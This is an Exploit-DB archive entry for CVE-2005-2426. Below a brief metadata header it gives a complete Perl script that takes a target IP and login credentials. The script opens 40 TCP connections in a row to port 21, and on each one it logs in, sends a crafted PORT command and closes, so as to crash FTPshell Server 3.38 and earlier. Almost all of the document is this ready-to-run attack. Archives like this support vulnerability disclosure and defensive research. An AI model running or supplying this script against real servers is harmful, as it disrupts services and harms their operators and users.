FTPshell Server <= 3.38 - Remote Denial of Service Exploit

2005-07-26T00:00:00
ID EDB-ID:1121
Type exploitdb
Reporter Reed Arvin
Modified 2005-07-26T00:00:00

Description

FTPshell Server <= 3.38 Remote Denial of Service Exploit. CVE-2005-2426. Dos exploit for windows platform

                                        
                                            #!/usr/bin/perl
#
# Usage: FTPShell_FTPDOS.pl &lt;ip&gt; &lt;user&gt; &lt;pass&gt;
#        FTPShell_FTPDOS.pl 127.0.0.1 hello moto
#
# FTPshell Server Version 3.38
#
# Download:
# http://www.ftpshell.com/
#
################################################

use IO::Socket;
use Win32;
use strict;

my($i)      = "";
my($socket) = "";

for ($i = 1; $i &lt;= 40; $i++)
{
        if ($socket = IO::Socket::INET-&gt;new(PeerAddr =&gt; $ARGV[0],
                                            PeerPort =&gt; "21",
                                            Proto    =&gt; "TCP"))
        {
                print "Login \#$i\n";

                Win32::Sleep(300);

                print $socket "USER $ARGV[1]\r\n";

                Win32::Sleep(100);

                print $socket "PASS $ARGV[2]\r\n";

                Win32::Sleep(100);

                print $socket "PORT 127,0,0,1,18,12\r\n";

                Win32::Sleep(100);

                close($socket);
        }
        else
        {
                print "Cannot connect to $ARGV[0]:21\n";
        }
}

# milw0rm.com [2005-07-26]